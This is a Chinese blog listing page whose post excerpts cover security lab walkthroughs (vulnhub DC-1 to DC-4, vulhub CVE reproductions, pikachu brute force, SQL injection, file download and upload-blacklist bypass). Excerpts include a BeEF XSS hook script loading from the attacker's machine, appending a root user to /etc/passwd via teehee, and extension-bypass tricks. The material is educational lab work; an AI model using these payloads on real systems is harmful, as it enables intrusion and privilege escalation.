自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 收藏
  • 关注

原创 vulnhub靶场——DC-4

我们通过各种方式获取的shell经常不稳定或者没有交互界面的原因,往往都是因为我们获取的shell不是标准的虚拟终端,此时我们其实可以借助于python来获取一个标准的虚拟终端环境。整个命令功能就是将cat test.txt的执行结果,通过管道符|,传给后一个命令wc -l,作为wc -l命令的执行对象。teehee命令:teehee命令可以往一个文件中追加内容,可以通过这个命令向/etc/passwd中追加一个超级用户。好吧,我作弊了,最开始整的俩超大字典,这一顿爆,大半天过去了进度刚刚露头。

2024-08-23 14:18:37 980

原创 vulnhub靶场——dc-3(有坑未填

对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上发推特给我寻求帮助,让你重新开始。看了其他wp 我还是找了半天,,,大家都没写这么细,可能就我太笨了。正常的话应该是可以提权的,整了半天,也没出来,,,,好像不止我一个人报这个错,有没有大神来指导一下/(ㄒoㄒ)/~~与之前的DC版本一样,这个版本是为初学者设计的,尽管这次只有一个标志、一个入口点,根本没有任何线索。路径错了,,,我php文件传到根目录下,没传到html文件夹中,果然不能照抄,无语。

2024-08-19 20:03:36 731

原创 vulnhub靶场——DC-2

wp-admin 基本上包含了 WordPress安装的所有配置文件,此外,wp-admin 还具有其他的一些功能,例如加载仪表盘,建立与数据库的连接等。文件夹是存储主题,插件,主题升级和上传到网站所有内容(例如图片,视频,音频,PDF文档等等其他文件)的地方,wp-content 文件夹下通常有三个子文件夹,分别是 plugins ,themes 以及 uploads。WordPress 站点目录结构下有三大根文件夹,分别是 wp-admin, wp-includes,wp-content。

2024-08-15 20:22:36 746

原创 vulnhub靶场——DC-1

下载后解压得到一个ova文件,直接vmware打开(这里我workstation pro17导入会报错,“未通过ovf规范一致性或虚拟硬件合规性检查”没留下截图,查了好多,最后点了重试,结果就就好了- -)这里把靶机和攻击机用同一种模式连接(都是NAT或者都是桥接),保证俩在同一网段,攻击机能访问到就行。有问题,问百度,so,目标有了,去找/sites/default/settings.php。整理一些思路,目前知道了一个flag4的账户,密码未知,还提示让提权root。

2024-08-12 13:15:41 803

原创 封神台在线靶场——第一章:为了女神小芳!

sql注入基础版。

2023-10-10 16:20:31 693 1

原创 vulhub靶场漏洞复现——Django-XSS(CVE-2017-12794)

物理机访问8000端口,是一个404页面。刷新页面再次创建用户触发错误弹窗。

2023-09-26 17:20:02 358

原创 vulhub靶场漏洞复现——Discuz

Board(简称 Discuz!,中国国家版权局著作权登记号 2006SR11895)是北京康盛新创科技有限责任公司推出的一套通用的社区建站系统,站长可以不需要任何编程基础,通过简单的安装和设置,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的网站。Discuz!的基础架构采用世界上最流行的web编程组合PHP+MySQL实现,是一个经过完善设计,适用于各种服务器环境的高效建站解决方案。

2023-09-21 16:39:33 595

原创 vulhub靶场漏洞复现——ActiveMQ

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ详解文章链接——消息中间件ActiveMQ链接web管理端口工作(消息传递)端口816161616。

2023-09-14 16:10:27 389 1

原创 pikachu靶场暴力破解——验证码绕过

pikachu靶场暴力破解——验证码绕过

2023-05-28 19:20:53 662 1

原创 pikachu靶场暴力破解篇——基于表单

pikachu靶场基于表单的暴力破解

2023-05-16 18:31:58 375 1

原创 SQL注入

预备知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。常见的SQL注入漏洞关键代码如下:$sql = "SELECT * FROM news WHERE id=";$sql . = $_GET['id'];$result = mysql_query($s

2021-07-06 22:54:56 130

原创 kali beef的使用

beef的安装可以直接安装也可以从源码安装,略beef安装好后,打开web登陆页面http://192.168.102.130:3000/ui/panelurl为kali机地址,可以从配置文件中修改3.把js加载进存在xss的地方(例pikachu)payload: <script src='http://192.168.102.130:3000/hook.js'></script>可以看到在不停的向102.130发起请求使用beef中终端发送弹窗.

2021-07-05 23:28:39 488

原创 任意文件下载漏洞

定义:文件下载漏洞是指文件下载功能没有对下载的文件类型,目录做合理严谨的过滤,导致用户可以下载服务器上的任意文件利用:获得站点源码(黑盒->白盒)获得站点与中间件配置文件获得应用与系统配置文件(ssh、myaql)防御:1、下载路径不可控,而是程序自动生成后保存在数据库中,根据ID进行下载2、对参数做严格的过滤,不能进行目录遍历(穿越)实验目标通过实验获得系统根目录下flag.php里面key的内容。key内容为DBApp{}内的字符串点进下载地址,跳转到下载页面在地址栏

2021-07-05 18:07:30 1626

原创 文件上传之黑名单绕过

黑名单绕过方法:1、大小写绕过windows对大小写不敏感,所以上传大小写混写的php进行绕过(因为后端一般验证后缀字符串是否和‘php’相等,(前提是没有将你传入的字符串进行小写转换后再对比),大写字母和小写字母肯定不相等,所以可以利用这一点进行绕过,又因为windows对大小写不敏感,所以.PhP文件被当成php文件解析)2、重写绕过:服务端将黑名单的后缀名替换为空,但是仅替换一次,所以可以上传.phphp p后缀,替换后就成了.php3、特殊可解析后缀绕过:黑名单规则不严谨,在某些特定.

2021-07-04 22:15:55 6978 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除